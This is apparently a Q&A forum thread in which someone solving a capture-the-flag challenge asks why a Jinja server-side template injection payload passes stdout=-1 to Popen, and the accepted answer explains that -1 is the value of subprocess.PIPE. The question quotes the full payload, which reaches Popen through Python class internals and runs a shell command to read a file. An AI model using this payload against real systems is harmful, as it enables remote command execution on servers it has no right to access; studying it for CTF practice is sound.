Popen stdout value

Question

im doing a ctf challenge about an SSTI. The solution payload is

{{"".__class__.__mro__[1].__subclasses__()[213](['cat','flag.txt'],stdout=-1).communicate()}}

I would like to know why stdout accepts -1 as a value. I could not find it in the current subprocess documentation.

chepner · Accepted Answer · 2022-03-20T15:26:42.470

1

-1 is just the value of subprocess.PIPE

PIPE = -1

Given the convoluted nature of getting a reference to Popen in the first place, subprocess.PIPE itself may not be available, so its value is used instead.

edited Mar 20 '22 at 15:26

answered Mar 20 '22 at 15:22

chepner

497,756
71
530
681

ty, it makes sense – João Luca Mar 20 '22 at 15:30

Popen stdout value

1 Answers1